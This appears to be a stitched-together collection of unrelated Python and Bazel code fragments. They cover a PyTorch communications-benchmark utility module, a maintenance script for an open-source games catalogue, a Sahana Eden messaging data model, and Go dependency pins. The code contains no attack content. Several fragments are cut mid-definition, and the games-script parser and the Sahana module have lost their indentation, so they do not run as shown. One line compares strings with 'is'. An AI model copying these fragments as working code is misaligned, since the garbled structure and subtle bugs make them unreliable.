            and (commsParams.beginSize / elem_size / world_size)
            < commsParams.quant_a2a_embedding_dim
        ):
            commsParams.beginSize = (
                commsParams.quant_a2a_embedding_dim * world_size * elem_size
            )
    elif collective in ("all_reduce", "reduce"):
        if commsParams.beginSize < elem_size:
            commsParams.beginSize = elem_size
def get_rank_details(backendFuncs):
    """Query the backend for rank/topology/device information.

    :return: (local_rank, global_rank, world_size, default group,
              device, hw device)
    """
    # evaluated left-to-right, preserving the original call order
    return (
        backendFuncs.get_local_rank(),
        backendFuncs.get_global_rank(),
        backendFuncs.get_world_size(),
        backendFuncs.get_default_group(),
        backendFuncs.get_device(),
        backendFuncs.get_hw_device(),
    )
def env2int(env_list, default=-1):
    """Return the first non-negative integer among the named env vars.

    :param env_list: environment variable names, checked in order
    :param default: returned when none of them holds a value >= 0
    :raises ValueError: if a set variable is not an integer (as the original)
    """
    for name in env_list:
        value = int(os.environ.get(name, -1))
        if value >= 0:
            return value
    return default
def read_comms_env_vars():
    """Collect world/local sizes and ranks from common launcher env vars.

    Checks MVAPICH2, Open MPI, PMI and torchrun-style variables; each value
    falls back to -1 when nothing is set.
    :return: dict with keys world_size, local_size, global_rank, local_rank
    """
    return {
        "world_size": env2int(
            ["MV2_COMM_WORLD_SIZE", "OMPI_COMM_WORLD_SIZE", "PMI_SIZE", "WORLD_SIZE"], -1
        ),
        "local_size": env2int(
            [
                "LOCAL_SIZE",
                "MPI_LOCALNRANKS",
                "MV2_COMM_WORLD_LOCAL_SIZE",
                "OMPI_COMM_WORLD_LOCAL_SIZE",
            ],
            -1,
        ),
        "global_rank": env2int(
            ["MV2_COMM_WORLD_RANK", "OMPI_COMM_WORLD_RANK", "PMI_RANK", "RANK"], -1
        ),
        "local_rank": env2int(
            [
                "LOCAL_RANK",
                "MPI_LOCALRANKID",
                "MV2_COMM_WORLD_LOCAL_RANK",
                "OMPI_COMM_WORLD_LOCAL_RANK",
            ],
            -1,
        ),
    }
def commonUrlRead(remotePath):
    """Fetch a remote text resource and return its body as a StringIO.

    :param remotePath: URL readable by urllib
    :return: io.StringIO over the UTF-8 decoded response
    """
    import urllib.request

    # TODO: add error handling for network/HTTP failures
    with urllib.request.urlopen(remotePath) as response:
        body = response.read()
    return StringIO(body.decode("utf-8"))
def initQuantCommCtx(collectiveArgs, commsParams):
    """Initialize quantized-communication state if the internal package exists.

    Falls back to full precision by resetting commsParams.bitwidth to 32 when
    the optional `internals` package cannot be imported.

    Fix: removed the redundant trailing `pass` — the except block already
    contains statements, so the `pass` was dead code.
    """
    logger.info(f"communication bitwidth set to {commsParams.bitwidth}")
    try:
        from internals import initialize_collectiveArgs_internal

        initialize_collectiveArgs_internal(collectiveArgs, commsParams)
    except ImportError:
        # cannot do quantization: reset bitwidth and continue unquantized
        logger.warning("quantization not supported, disabled and continue...")
        commsParams.bitwidth = 32
def checkQuantArgs(collective, dtype, beginSize, quant_a2a_embedding_dim, blockingFlag):
    """Validate quantization-related arguments.

    :raises NotImplementedError: for collectives without quantization support,
        for non-blocking quantized all_to_all, and for dtypes other than
        torch.float32
    """
    supported = ("all_to_all", "all_to_allv", "reduce", "all_reduce")
    if collective not in supported:
        raise NotImplementedError(
            f"quantized communication for {collective} is currently unsupported."
        )
    if collective in ("all_to_all", "all_to_allv"):
        # warn (not fail) when the element count isn't embedding-dim aligned
        if (beginSize // 4) % quant_a2a_embedding_dim != 0:
            logger.warning(
                f"begin size {beginSize} must be a multiple of --quant-a2a-embedding-dim {quant_a2a_embedding_dim} for all_to_all operation"
            )
        if blockingFlag != 1:
            raise NotImplementedError("quantized All_to_all must be synchronous.")
    if dtype != torch.float32:
        raise NotImplementedError(
            f"quantization for {dtype} is not supported. Use float32 instead."
        )
def clearQuantCommCtx(collectiveArgs):
    """Remove quantization hooks installed by initQuantCommCtx, if any."""
    try:
        logger.debug("Removing installed quantization handlers.")
        from internals import remove_quantization_handlers

        remove_quantization_handlers(collectiveArgs)
    except ImportError:
        # internals package absent: nothing was ever installed
        pass
def paramToCommName(name, supported_comms=None):
    """
    Map any possible creative collective names to the internal name.
    Validates `name` if `supported_comms` is provided; on failure the process
    exits via gracefulExit.
    """
    name_aliases = {
        "alltoall": "all_to_all",
        "alltoallv": "all_to_allv",
        "alltoallbase": "all_to_allv",
        "allreduce": "all_reduce",
        "allgather": "all_gather",
        "allgatherbase": "all_gather_base",
        "reducescatter": "reduce_scatter",
        "recvanysource": "recv",
    }
    # canonical form: lowercase with every non-letter stripped
    canonical = "".join(ch for ch in name.lower() if ch.isalpha())
    # known alias -> internal name; otherwise keep the caller's spelling
    new_name = name_aliases.get(canonical, name)
    if supported_comms is not None and new_name not in supported_comms:
        gracefulExit(
            f"{name} is not a supported communication in PARAM! Supported comms: {supported_comms}"
        )
    return new_name
def ensureTensorFlush(tensors):
    """Touch the last element so the preceding collective isn't optimized away.

    :param tensors: a torch.Tensor, or a non-empty list of tensors (as used by
        collectives like all_gather)
    :return: the value of the last element, or None for empty/other inputs
    """
    if isinstance(tensors, list) and len(tensors) > 0:
        # list-of-tensors case: read the last element of the last tensor
        return tensors[-1][-1].item()
    if isinstance(tensors, torch.Tensor) and tensors.nelement() > 0:
        return tensors[-1].item()
    return None
@dataclass
class paramTimer:
    """Simple accumulator for elapsed time, stored in nanoseconds."""

    elapsedTimeNS: float = 0.0  # accumulated time, always in nanoseconds

    def reset(self, newTime=0.0):
        """Set the accumulated time to *newTime* nanoseconds."""
        self.elapsedTimeNS = newTime

    def incrTimeNS(self, timeNS):
        """Add *timeNS* nanoseconds to the accumulator."""
        self.elapsedTimeNS += timeNS

    def getTimeUS(self) -> float:
        """Return the accumulated time in microseconds."""
        return self.elapsedTimeNS / 1e3

    def getTimeNS(self) -> float:
        """Return the accumulated time in nanoseconds."""
        return self.elapsedTimeNS
class paramProfile(record_function):
    """Inherit from PyTorch profiler to enable autograd profiling while measuring the time interval in PARAM"""

    def __init__(self, timer=None, description=""):
        # timer: optional paramTimer that accumulates the measured interval
        # description: label used both for the profiler record and for logging
        self.description = description
        self.timer = timer
        super().__init__(name=description)

    def __enter__(self):
        # enter the profiler scope first, then start the wall clock so the
        # profiler's own entry overhead is not included in the measurement
        super().__enter__()
        self.start = time.monotonic()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.end = time.monotonic()
        self.intervalNS = (self.end - self.start) * 1e9  # keeping time in NS
        # if given a valid paramTimer object, directly update the measured time interval
        if isinstance(self.timer, paramTimer):
            self.timer.incrTimeNS(self.intervalNS)
        logger.debug(f"{self.description} took {self.intervalNS} ns")
        # close the profiler scope last, mirroring __enter__'s ordering
        super().__exit__(exc_type, exc_value, traceback)
class backendFunctions(ABC):
    """Abstract base class, provides common abstraction for all the backends."""

    def __init__(self):
        # Dispatch table: canonical collective name -> bound implementation.
        # Concrete backends inherit this and implement the abstract methods.
        self.collectiveFunc = {
            "all_to_all": self.all_to_all,
            "all_to_allv": self.all_to_allv,
            "all_reduce": self.all_reduce,
            "broadcast": self.broadcast,
            "all_gather": self.all_gather,
            "all_gather_base": self.all_gather_base,
            "reduce": self.reduce,
            "reduce_scatter": self.reduce_scatter,
            "reduce_scatter_base": self.reduce_scatter_base,
            "barrier": self.barrier,
            "incast": self.incast,
            "multicast": self.multicast,
            "noop": self.noop,
        }

    def getBusBW(self, collective, algBW, collectiveArgs):
        """Convert algorithmic bandwidth into bus bandwidth for *collective*.

        Scaling follows nccl-tests: 2(n-1)/n for all_reduce, (n-1)/n for the
        all-to-all / gather / scatter family, and 1.0 for rooted collectives.
        Unknown collectives are logged and returned unscaled.
        """
        busBW = algBW
        numRanks = collectiveArgs.world_size
        if collective == "all_reduce":
            if numRanks != 0:
                busBW = algBW * (2 * (numRanks - 1) / (numRanks))
        elif collective in (
            "all_to_all",
            "all_to_allv",
            "all_gather",
            "reduce_scatter",
            "reduce_scatter_base",
            "all_gather_base",
        ):
            if numRanks != 0:
                busBW = algBW * ((numRanks - 1) / (numRanks))
        elif collective in ("reduce", "broadcast", "incast", "multicast"):
            busBW = algBW
        else:
            logger.error(
                f"collective: {collective} is not supported in computing bus BW! "
            )
        return busBW

    def alloc_ones(
        self, sizeArr, curRankDevice="cuda", dtype=torch.float32, scaleFactor=1.0
    ):
        """Allocate a tensor of ones on *curRankDevice*, scaled by *scaleFactor*."""
        ipTensor = torch.ones(sizeArr, device=curRankDevice, dtype=dtype)
        if scaleFactor != 1.0:
            ipTensor = ipTensor * scaleFactor
        return ipTensor

    def noop(self, collectiveArgs=None, retFlag=False, pair=False):
        """no-op for the case we want to skip comms/compute"""
        pass

    @abstractmethod
    def sayHello(self, global_rank, local_rank, world_size, master_ip):
        """Log identifying information for this rank (debug aid)."""
        pass

    # Collectives
    @abstractmethod
    def all_reduce(self, collectiveArgs, retFlag=False):
        pass

    @abstractmethod
    def reduce(self, collectiveArgs, retFlag=False):
        pass

    @abstractmethod
    def all_to_all(self, collectiveArgs, retFlag=False):
        pass

    @abstractmethod
    def all_to_allv(self, collectiveArgs, retFlag=False):
        pass

    @abstractmethod
    def complete_accel_ops(self, collectiveArgs, initOp=False):
        """Block until outstanding accelerator/collective work completes."""
        pass

    @abstractmethod
    def barrier(self, collectiveArgs, name="dummy"):
        pass

    def sync_barrier(self, collectiveArgs, desc="world"):
        """Convenience wrapper: barrier across the given (default) scope."""
        self.barrier(collectiveArgs, name=desc)

    @abstractmethod
    def get_reduce_op(self, opName):
        """Map a reduce-op name to the backend's native op object."""
        pass

    # Compute functions
    @abstractmethod
    def gemm(self, collectiveArgs):
        pass

    # Memory related
    @abstractmethod
    def get_mem_size(self, collectiveArgs):
        pass

    @abstractmethod
    def alloc_random(self, sizeArr, curRankDevice, dtype, scaleFactor=1.0):
        pass

    @abstractmethod
    def alloc_embedding_tables(self, n, m, curRankDevice, dtype):
        pass

    @abstractmethod
    def alloc_empty(self, sizeArr, dtype, curRankDevice):
        pass

    @abstractmethod
    def clear_memory(self, collectiveArgs):
        pass

    # Getting world-size and other information.
    @abstractmethod
    def get_local_rank(self):
        pass

    @abstractmethod
    def get_global_rank(self):
        pass

    @abstractmethod
    def get_world_size(self):
        pass

    @abstractmethod
    def get_device(self):
        pass

    @abstractmethod
    def get_hw_device(self):
        pass

    @abstractmethod
    def get_default_group(self):
        pass

    @abstractmethod
    def get_groups(self):
        pass

    # Init functions
    @abstractmethod
    def initialize_backend(self, master_ip, master_port, backend="gloo"):
        pass

    @abstractmethod
    def benchmark_comms(self):
        pass
class comms_world_info_holder:
def __init__(self, master_ip, master_port, num_tpu_cores, comms_env_params):
# Holding communication-world related parameters.
| |
# gh_stars: 0
"""
Runs a series of maintenance operations on the collection of entry files, updating the table of content files for
each category as well as creating a statistics file.
Counts the number of records each sub-folder and updates the overview.
Sorts the entries in the contents files of each sub folder alphabetically.
This script runs with Python 3; it could also run with Python 2 with some minor tweaks.
"""
import re
import urllib.request
import http.client
import datetime
import json
import textwrap
from utils.utils import *
TOC = '_toc.md'
def get_category_paths():
    """
    Returns all sub folders of the games path.
    """
    return [os.path.join(games_path, entry)
            for entry in os.listdir(games_path)
            if os.path.isdir(os.path.join(games_path, entry))]
def get_entry_paths(category_path):
    """
    Returns all files of a category path, except for '_toc.md'.
    """
    return [os.path.join(category_path, entry)
            for entry in os.listdir(category_path)
            if entry != TOC and os.path.isfile(os.path.join(category_path, entry))]
def extract_overview_for_toc(file):
    """
    Parses a file for some interesting fields and concatenates the content.
    To be displayed after the game name in the category TOCs.
    """
    # NOTE(review): `infos` is a module-level mapping (presumably filled by
    # utils.utils) from file path to parsed entry fields — confirm upstream
    info = infos[file]
    fields = []
    # fixed display order: code language, code license, state
    for key in ('code language', 'code license', 'state'):
        if key in info:
            fields.extend(info[key])
    return ", ".join(fields)
def update_readme():
    """
    Recounts entries in sub categories and writes them to the readme.
    Also updates the _toc files in the categories directories.
    Note: The Readme must have a specific structure at the beginning, starting with "# Open Source Games" and ending
    on "A collection.."
    Needs to be performed regularly.
    """
    print('update readme file')
    readme_text = read_text(readme_file)
    # locate the single autogenerated section delimited by the comment markers
    pattern = re.compile(r"(.*?)(\[comment\]: # \(start.*?end of autogenerated content\))(.*)", re.DOTALL)
    matches = pattern.findall(readme_text)
    assert len(matches) == 1
    prefix, _, suffix = matches[0]
    # gather per-category titles and entry counts
    category_paths = get_category_paths()
    toc_paths = [os.path.join(path, TOC) for path in category_paths]
    # titles: drop the leading "# " and the trailing newline
    category_titles = [read_first_line(path)[2:-1] for path in toc_paths]
    # entry counts: minus 1 for the TOC file itself
    n_entries = [len(os.listdir(path)) - 1 for path in category_paths]
    info = zip(category_titles, [os.path.basename(path) for path in category_paths], n_entries)
    # sort by category title (assumed unique)
    info = sorted(info, key=lambda entry: entry[0])
    lines = ['- **[{}](games/{}/{})** ({})\n'.format(entry[0], entry[1], TOC, entry[2]) for entry in info]
    update = "{} entries\n".format(sum(n_entries)) + "".join(lines)
    # splice the regenerated section back between the markers
    text = prefix + "[comment]: # (start of autogenerated content, do not edit)\n" + update + "\n[comment]: # (end of autogenerated content)" + suffix
    write_text(readme_file, text)
def update_category_tocs():
    """
    Lists all entries in all sub folders and generates the list in the toc file.
    Needs to be performed regularly.
    """
    for category_path in get_category_paths():
        print('generate toc for {}'.format(os.path.basename(category_path)))
        # the first line of the toc file (the category heading) stays as is
        toc_file = os.path.join(category_path, TOC)
        toc_header = read_first_line(toc_file)
        # gather, per entry: title (discarding first two ("# ") and last ("\n")
        # characters) plus the condensed overview information
        entry_paths = get_entry_paths(category_path)
        titles = [read_first_line(path)[2:-1] for path in entry_paths]
        more = [extract_overview_for_toc(path) for path in entry_paths]
        # combine name, file name and more info; sort by entry title (should be unique)
        info = sorted(zip(titles, (os.path.basename(path) for path in entry_paths), more), key=lambda x: x[0])
        # assemble the autogenerated list
        update = "".join('- **[{}]({})** ({})\n'.format(*entry) for entry in info)
        # combine with toc header
        text = toc_header + '\n' + "[comment]: # (start of autogenerated content, do not edit)\n" + update + "\n[comment]: # (end of autogenerated content)"
        # use the shared helper instead of a raw open(), for consistency with update_readme()
        write_text(toc_file, text)
def check_validity_external_links():
    """
    Checks all external links it can find for validity. Prints those with non OK HTTP responses. Does only need to be run
    from time to time.
    """
    # regex for finding urls (can be in <> or in () or a whitespace);
    # each match is a tuple with one group per alternative
    regex = re.compile(r"[\s\n]<(http.+?)>|\]\((http.+?)\)|[\s\n](http[^\s\n,]+)")
    number_checked_links = 0
    category_paths = get_category_paths()
    for category_path in category_paths:
        print('check links for {}'.format(os.path.basename(category_path)))
        entry_paths = get_entry_paths(category_path)
        for entry_path in entry_paths:
            content = read_text(entry_path)
            matches = regex.findall(content)
            for match in matches:
                # only one of the alternative groups is non-empty per match
                for url in match:
                    if url:
                        try:
                            # without a special header, frequent 403 responses occur
                            req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64)'})
                            # close the response explicitly (context manager);
                            # previously the sockets leaked until garbage collection
                            with urllib.request.urlopen(req):
                                pass
                        except urllib.error.HTTPError as e:
                            print("{}: {} - {}".format(os.path.basename(entry_path), url, e.code))
                        except urllib.error.URLError as e:
                            print("{}: {} - {}".format(os.path.basename(entry_path), url, e.reason))
                        except http.client.RemoteDisconnected:
                            print("{}: {} - disconnected without response".format(os.path.basename(entry_path), url))
                        number_checked_links += 1
                        if number_checked_links % 50 == 0:
                            print("{} links checked".format(number_checked_links))
    print("{} links checked".format(number_checked_links))
def check_template_leftovers():
    """
    Checks for template leftovers.
    Should be run only occasionally.
    """
    # every non-empty, non-heading ("##") line of the template must not appear
    # verbatim in an entry; such a line indicates an unfilled template field
    text = read_text(os.path.join(games_path, 'template.md'))
    check_strings = [line for line in text.split('\n') if line and not line.startswith('##')]
    for category_path in get_category_paths():
        for entry_path in get_entry_paths(category_path):
            content = read_text(entry_path)
            for check_string in check_strings:
                # idiomatic membership test instead of content.find(...) >= 0
                if check_string in content:
                    print('{}: found {}'.format(os.path.basename(entry_path), check_string))
def parse_entry(content):
"""
Returns a dictionary of the features of the content
"""
info = {}
# read title
regex = re.compile(r"^# (.*)") # start of content, starting with "# " and then everything until the end of line
matches = regex.findall(content)
assert len(matches) == 1
assert matches[0]
info['title'] = matches[0]
# read description
regex = re.compile(r"^.*\n\n_(.*)_\n") # third line from top, everything between underscores
matches = regex.findall(content)
assert len(matches) == 1, info['title']
assert matches[0]
info['description'] = matches[0]
# first read all field names
regex = re.compile(r"^- (.*?): ", re.MULTILINE) # start of each line having "- ", then everything until a colon, then ": "
fields = regex.findall(content)
# check that essential fields are there
essential_fields = ['Home', 'State', 'Code repository', 'Code language']
for field in essential_fields:
if field not in fields:
print('Error: Essential field "{}" missing in entry "{}"'.format(field, info['title']))
return info # so that the remaining entries can also be parsed
# check that all fields are valid fields and are existing in that order
valid_fields = ('Home', 'Media', 'State', 'Play', 'Download', 'Platform', 'Keywords', 'Code repository', 'Code language', 'Code license', 'Code dependencies', 'Assets license', 'Build system', 'Build instructions')
index = 0
for field in fields:
while index < len(valid_fields) and field != valid_fields[index]:
index += 1
if index == len(valid_fields):
print('Error: Field "{}" in entry "{}" either misspelled or in wrong order'.format(field, info['title']))
return info # so that the remaining entries can also be parsed
# iterate over found fields
for field in fields:
regex = re.compile(r"- {}: (.*)".format(field))
matches = regex.findall(content)
assert len(matches) == 1 # every field should only be present once
v = matches[0]
# first store as is
info[field.lower()+'-raw'] = v
# remove parenthesis
v = re.sub(r'\([^)]*\)', '', v)
# split on ','
v = v.split(',')
# strip
v = [x.strip() for x in v]
# remove all being false (empty)
v = [x for x in v if x]
# if entry is of structure <..> remove <>
v = [x[1:-1] if x[0] is '<' and x[-1] is '>' else x for x in v]
# empty fields will not be stored
if not v:
continue
# store in info
info[field.lower()] = v
# state (essential field) must contain either beta or mature but not both, but at least one
v = info['state']
| |
<reponame>ptressel/sahana-eden-madpub
# -*- coding: utf-8 -*-
"""
Messaging module
"""
module = "msg"
if deployment_settings.has_module(module):
# Settings
resourcename = "setting"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("outgoing_sms_handler"),
# Moved to deployment_settings
#Field("default_country_code", "integer", default=44),
migrate=migrate)
table.outgoing_sms_handler.requires = IS_IN_SET(["Modem", "Gateway", "Tropo"], zero=None)
#------------------------------------------------------------------------
resourcename = "email_settings"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("inbound_mail_server"),
Field("inbound_mail_type"),
Field("inbound_mail_ssl", "boolean"),
Field("inbound_mail_port", "integer"),
Field("inbound_mail_username"),
Field("inbound_mail_password"),
Field("inbound_mail_delete", "boolean"),
# Also needs to be used by Auth (order issues), DB calls are overheads
# - as easy for admin to edit source in 000_config.py as to edit DB (although an admin panel can be nice)
#Field("outbound_mail_server"),
#Field("outbound_mail_from"),
migrate=migrate)
table.inbound_mail_type.requires = IS_IN_SET(["imap", "pop3"], zero=None)
#------------------------------------------------------------------------
resourcename = "modem_settings"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
#Field("account_name"), # Nametag to remember account - To be used later
Field("modem_port"),
Field("modem_baud", "integer", default = 115200),
Field("enabled", "boolean", default = False),
#Field("preference", "integer", default = 5), To be used later
migrate=migrate)
#------------------------------------------------------------------------
resourcename = "gateway_settings"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("url",
default = "https://api.clickatell.com/http/sendmsg"),
Field("parameters",
default="user=yourusername&password=<PASSWORD>&api_id=yourapiid"),
Field("message_variable", "string", default = "text"),
Field("to_variable", "string", default = "to"),
Field("enabled", "boolean", default = False),
#Field("preference", "integer", default = 5), To be used later
migrate=migrate)
#------------------------------------------------------------------------
resourcename = "tropo_settings"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("token_messaging"),
#Field("token_voice"),
migrate=migrate)
#------------------------------------------------------------------------
resourcename = "twitter_settings"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("pin"),
Field("oauth_key"),
Field("oauth_secret"),
Field("twitter_account"),
migrate=migrate)
table.oauth_key.writable = False
table.oauth_secret.writable = False
### comment these 2 when debugging
table.oauth_key.readable = False
table.oauth_secret.readable = False
table.twitter_account.writable = False
def twitter_settings_onvalidation(form):
""" Complete oauth: take tokens from session + pin from form, and do the 2nd API call to Twitter """
if form.vars.pin and session.s3.twitter_request_key and session.s3.twitter_request_secret:
try:
import tweepy
except:
raise HTTP(501, body=T("Can't import tweepy"))
oauth = tweepy.OAuthHandler(deployment_settings.twitter.oauth_consumer_key,
deployment_settings.twitter.oauth_consumer_secret)
oauth.set_request_token(session.s3.twitter_request_key, session.s3.twitter_request_secret)
try:
oauth.get_access_token(form.vars.pin)
form.vars.oauth_key = oauth.access_token.key
form.vars.oauth_secret = oauth.access_token.secret
twitter = tweepy.API(oauth)
form.vars.twitter_account = twitter.me().screen_name
form.vars.pin = "" # we won't need it anymore
return
except tweepy.TweepError:
session.error = T("Settings were reset because authenticating with Twitter failed")
# Either user asked to reset, or error - clear everything
for k in ["oauth_key", "oauth_secret", "twitter_account"]:
form.vars[k] = None
for k in ["twitter_request_key", "twitter_request_secret"]:
session.s3[k] = ""
s3xrc.model.configure(table, onvalidation=twitter_settings_onvalidation)
#------------------------------------------------------------------------
# Message priority
msg_priority_opts = {
3:T("High"),
2:T("Medium"),
1:T("Low")
}
#------------------------------------------------------------------------
# Message Log - This is where all the messages / logs go into
resourcename = "log"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
super_link(db.pr_pentity), # pe_id, Sender
Field("sender"), # The name to go out incase of the email, if set used
Field("fromaddress"), # From address if set changes sender to this
Field("recipient"),
Field("subject", length=78),
Field("message", "text"),
#Field("attachment", "upload", autodelete = True), #TODO
Field("verified", "boolean", default = False),
Field("verified_comments", "text"),
Field("actionable", "boolean", default = True),
Field("actioned", "boolean", default = False),
Field("actioned_comments", "text"),
# Hide until actually wired-up for something
#Field("priority", "integer", default = 1),
Field("inbound", "boolean", default = False),
migrate=migrate,
*(s3_timestamp() + s3_uid() + s3_deletion_status()))
table.uuid.requires = IS_NOT_ONE_OF(db, "%s.uuid" % tablename)
#table.priority.requires = IS_NULL_OR(IS_IN_SET(msg_priority_opts))
#table.priority.label = T("Priority")
table.inbound.label = T("Direction")
table.inbound.represent = lambda direction: (direction and ["In"] or ["Out"])[0]
#@ToDo More Labels for i18n
s3xrc.model.configure(table,
list_fields=["id",
"inbound",
"pe_id",
"fromaddress",
"recipient",
"subject",
"message",
"verified",
#"verified_comments",
"actionable",
"actioned",
#"actioned_comments",
#"priority"
])
# Reusable Message ID
message_id = S3ReusableField("message_id", db.msg_log,
requires = IS_NULL_OR(IS_ONE_OF(db, "msg_log.id")),
# FIXME: Subject works for Email but not SMS
represent = lambda id: db(db.msg_log.id == id).select(db.msg_log.subject,
limitby=(0, 1)).first().subject,
ondelete = "RESTRICT"
)
#------------------------------------------------------------------------
# Message Tag - Used to tag a message to a resource
resourcename = "tag"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
message_id(),
Field("resource"),
Field("record_uuid", # null in this field implies subscription to the entire resource
type=s3uuid,
length=128),
migrate=migrate,
*(s3_timestamp() + s3_uid() + s3_deletion_status()))
table.uuid.requires = IS_NOT_ONE_OF(db, "%s.uuid" % tablename)
s3xrc.model.configure(table,
list_fields=[ "id",
"message_id",
"record_uuid",
"resource",
])
#------------------------------------------------------------------------
# Twitter Search Queries
resourcename = "twitter_search"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("search_query", length = 140),
migrate = migrate
)
#------------------------------------------------------------------------
# Twitter Search Results
resourcename = "twitter_search_results"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("tweet", length=140),
Field("posted_by"),
Field("posted_at"),
Field("twitter_search", db.msg_twitter_search),
migrate = migrate
)
#table.twitter_search.requires = IS_ONE_OF(db, "twitter_search.search_query")
#table.twitter_search.represent = lambda id: db(db.msg_twitter_search.id == id).select(db.msg_twitter_search.search_query, limitby = (0,1)).first().search_query
s3xrc.model.add_component(module, resourcename,
multiple=True,
joinby=dict(msg_twitter_search="twitter_search"))
s3xrc.model.configure(table,
list_fields=[ "id",
"tweet",
"posted_by",
"posted_at",
"twitter_search",
])
#------------------------------------------------------------------------
# The following was added to show only the supported messaging methods
msg_contact_method_opts = { # pr_contact_method dependency
1:T("Email"),
2:T("Mobile Phone"),
#3:T("XMPP"),
4:T("Twitter"),
}
# Channel - For inbound messages this tells which channel the message came in from.
resourcename = "channel"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
message_id(),
Field("pr_message_method", "integer",
requires = IS_IN_SET(msg_contact_method_opts, zero=None),
default = 1),
Field("log"),
migrate=migrate,
*(s3_timestamp() + s3_uid() + s3_deletion_status()))
#------------------------------------------------------------------------
# Status
resourcename = "email_inbound_status"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("status"),
migrate=migrate)
# Valid message outbox statuses
msg_status_type_opts = {
1:T("Unsent"),
2:T("Sent"),
3:T("Draft"),
4:T("Invalid")
}
opt_msg_status = db.Table(None, "opt_msg_status",
Field("status", "integer", notnull=True,
requires = IS_IN_SET(msg_status_type_opts, zero=None),
default = 1,
label = T("Status"),
represent = lambda opt: msg_status_type_opts.get(opt, UNKNOWN_OPT)))
# Outbox - needs to be separate to Log since a single message sent needs different outbox entries for each recipient
resourcename = "outbox"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
message_id(),
super_link(db.pr_pentity), # pe_id, Person/Group to send the message out to
Field("address"), # If set used instead of picking up from pe_id
Field("pr_message_method", "integer",
requires = IS_IN_SET(msg_contact_method_opts, zero=None),
default = 1,
label = T("Contact Method"),
represent = lambda opt: msg_contact_method_opts.get(opt, UNKNOWN_OPT)),
opt_msg_status,
Field("system_generated", "boolean", default = False),
Field("log"),
migrate=migrate,
*(s3_timestamp() + s3_uid() + s3_deletion_status()))
s3xrc.model.add_component(module, resourcename,
multiple=True,
joinby=dict(msg_log="message_id"))
table.uuid.requires = IS_NOT_ONE_OF(db, "%s.uuid" % tablename)
s3xrc.model.configure(table,
list_fields=[ "id",
"message_id",
"pe_id",
"status",
"log",
])
# Message Read Status - To replace Message Outbox #TODO
resourcename = "read_status"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
message_id(),
person_id(),
migrate=migrate,
*(s3_timestamp() + s3_uid() + s3_deletion_status()))
table.uuid.requires = IS_NOT_ONE_OF(db, "%s.uuid" % tablename)
s3xrc.model.configure(table,
list_fields=[ "id",
"message_id",
"person_id",
])
#------------------------------------------------------------------------
# Tropo Scratch pad for outbound messaging
resourcename = "tropo_scratch"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("row_id","integer"),
Field("message_id","integer"),
Field("recipient"),
Field("message"),
Field("network"),
migrate=migrate,
*(s3_timestamp() + s3_uid() + s3_deletion_status()))
table.uuid.requires = IS_NOT_ONE_OF(db, "%s.uuid" % tablename)
# SMS store for persistence and scratch pad for combining incoming xform chunks
resourcename = "xforms_store"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("sender", "string", length = 20),
Field("fileno", "integer"),
Field("totalno", "integer"),
Field("partno", "integer"),
Field("message", "string", length = 160),
migrate=migrate)
#------------------------------------------------------------------------
# CAP: Common Alerting Protocol
# http://docs.oasis-open.org/emergency/cap/v1.2/CAP-v1.2.html
# CAP alert Status Code (status)
cap_alert_status_code_opts = {
"Actual":T("Actionable by all targeted recipients"),
"Exercise":T("Actionable only by designated exercise participants; exercise identifier SHOULD appear in <note>"),
"System":T("For messages that support alert network internal functions"),
"Test":T("Technical testing only, all recipients disregard"),
"Draft":T("preliminary template or draft, not actionable in its current form"),
}
# CAP info Event Category (category)
cap_info_category_opts = {
"Geo":T("Geophysical (inc. landslide)"),
"Met":T("Meteorological (inc. flood)"),
"Safety":T("General emergency and public safety"),
"Security":T("Law enforcement, military, homeland and local/private security"),
"Rescue":T("Rescue and recovery"),
"Fire":T("Fire suppression and rescue"),
"Health":T("Medical and public health"),
"Env":T("Pollution and other environmental"),
"Transport":T("Public and private transportation"),
"Infra":T("Utility, telecommunication, other non-transport infrastructure"),
"CBRNE":T("Chemical, Biological, Radiological, Nuclear or High-Yield Explosive threat or attack"),
"Other":T("Other events"),
}
# CAP info Response Type (responseType)
cap_info_responseType_opts = {
"Shelter":T("Take shelter in place or per <instruction>"),
"Evacuate":T("Relocate as instructed in the <instruction>"),
"Prepare":T("Make preparations per the <instruction>"),
"Execute":T("Execute a pre-planned activity identified in <instruction>"),
"Avoid":T("Avoid the subject event as per the <instruction>"),
"Monitor":T("Attend to information sources as described in <instruction>"),
"Assess":T("Evaluate the information in this message. (This value SHOULD NOT be used in public warning applications.)"),
"AllClear":T("The subject event no longer poses a threat or concern and any follow on action is described in <instruction>"),
"None":T("No action recommended"),
}
# Reports
# Verified reports ready to be sent out as alerts or displayed on a map
| |
"h1:/M4H/1G4avsieL6BbUwCOBzulmoeKVP5ux/3mQNnbyI=",
version = "v1.1.0",
)
# Bazel rules_go external dependency pins (autogenerated from go.mod/go.sum):
# each go_repository locks one Go module to a version and its go.sum hash
# ("h1:..."); when bumping a version, update sum and version together.
go_repository(
name = "com_github_masterminds_goutils",
importpath = "github.com/Masterminds/goutils",
sum = "h1:zukEsf/1JZwCMgHiK3GZftabmxiCw4apj3a28RPBiVg=",
version = "v1.1.0",
)
go_repository(
name = "com_github_masterminds_semver_v3",
importpath = "github.com/Masterminds/semver/v3",
sum = "h1:Y2lUDsFKVRSYGojLJ1yLxSXdMmMYTYls0rCvoqmMUQk=",
version = "v3.1.0",
)
go_repository(
name = "com_github_masterminds_sprig_v3",
